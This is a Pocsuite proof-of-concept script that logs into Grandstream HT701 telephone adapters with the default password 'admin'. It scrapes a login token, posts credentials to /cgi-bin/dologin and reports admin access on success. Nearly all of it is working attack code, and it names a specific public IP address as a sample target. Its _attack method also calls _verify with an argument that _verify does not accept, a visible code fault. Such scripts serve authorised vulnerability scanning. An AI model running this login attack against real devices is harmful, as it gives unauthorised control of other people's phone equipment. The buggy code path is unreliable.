Grandstream HT701 IP analog telephone adapter background of the weak password vulnerability

                                                #!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import re


class TestPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['Hcamael']
    vulDate = '2016-11-11'
    createDate = '2016-11-11'
    updateDate = '2016-11-11'
    references = ['']
    name = 'Grandstream HT701 IP模拟电话适配器后台弱密码登陆漏洞'
    appPowerLink = 'http://www.grandstream.cn/Prd_view.aspx?id=87'
    appName = 'Grandstream'
    appVersion = 'HT701'
    vulType = 'weak password'
    desc = '''
        Grandstream HT701 后台使用默认密码admin
    '''
    samples = ['http://184.162.154.124:16010/']
    install_requires = ['']
    #请尽量不要使用第三方库，必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段

    def _attack(self):
        result = {}
        #Write your code here
        return self._verify(result)

    def _verify(self):
        result = {}
        r = req.get(self.url)
        rkey = re.findall('name="gnkey".*value=(.*?)>',r.content)
        if len(rkey) > 0:
            data = {}
            data['P2'] = 'admin'
            data['Login'] = 'Login'
            data['gnkey'] = rkey[0]
            url = self.url + "/cgi-bin/dologin"
            r2 = req.post(url, data=data)
            if "<b>ADVANCED SETTINGS</b>" in r2.content and "<b>FXS PORT</b>" in r2.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['AdminInfo'] = {}
                result['AdminInfo']['Password'] = "admin"
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)